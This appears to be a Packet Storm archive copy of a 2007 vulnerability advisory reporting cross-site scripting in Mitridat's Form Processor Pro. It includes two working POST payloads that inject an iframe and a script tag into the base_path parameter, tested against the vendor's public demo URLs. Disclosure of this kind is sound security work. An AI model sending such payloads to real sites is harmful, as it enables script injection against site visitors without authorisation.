what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mitridat-xss.txt

mitridat-xss.txt
Posted Jul 26, 2007
Authored by Charles Kim

Mitridat's Form Processor Pro suffers from cross site scripting vulnerabilities.

tags | advisory, vulnerability, xss
SHA-256 | 566d7fda7a4e1adf92ab3b359ce8625c0ac40ac810f5d475c731cebe8cbb296e

mitridat-xss.txt

Change Mirror Download
Greetings,

I have discovered cross-site scripting vulnerability in Mitridat's
Form Processor Pro.

http://www.mitridat.com/
http://www.mitridat.com/products-form-processor-pro.html

Form Mail: Email Form Processor Pro™ - process all forms on your website
Form Mail: Email Form Processor Pro is the most powerful script to
process forms on your website. The script is available in

PHP, Perl and ASP versions. No programming knowledge needed to install
this script and configure your forms to work with it.

One script can handle unlimited amount of any sophisticated forms. You
have full layout and design control. The script is

featured with:

* auto responder;
* "preview" and "thank you" pages;
* supports attachments, calculations, "if" condition, variable
field validations, html emails;
* supports multiple pages forms, database data storing and much
more features!


Operating system and software installed.
-Apache 1.3.37
-Form Mail: eMail Form Processor Pro (c) 2000-2003 MitriDAT
-The date stamp for this product is year 2000-2003.
-Mitridat's customer demo on their website has the same date stamp.

How the vulnerability can be reproduced
-A HTTP POST to the following parameters with either an IFRAME or SCRIPT tag.
base_path=

What impact the vulnerability has on the vulnerable system?
By enticing a user to click on a crafted url, an attacker can execute
arbitrary script code on the victim's browser.

Any additional details that might help in the verification process.
This initial discovery was on a customer running Mitridat's Form
Processor Pro. I was then able to verify the parameter by looking up
Mitridat's website and verifying the xss from their public demo.

Mitridat has demo's of the Form Processor Pro for public view.
http://www.mitridat.com/products-form-processor-pro.html
http://www.email-form.com/online-demo.html

Here are tested POSTs I've done on Mitridat's public internet demo's.

URL
http://www.email-form.com/sample-forms/simple-contact-form-with-preview/simple-contact-form-with-preview.html

POST
base_path=<iframe
src=/>&r_Name=&Company-Name=&re_eMail=&Web-Site-URL=http%3A%2F%2F&r_Country=&Phone=&Fax=&r_Subject=&r_Message=&ok2.x=39&ok2.y=13

POST
base_path=<script>alert(1111)</script>&r_Name=&Company-Name=&re_eMail=&Web-Site-URL=http%3A%2F%2F&r_Country=&Phone=&Fax=&r_Subject=&r_Message=&ok2.x=17&ok2.y=6



Charles H Kim
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close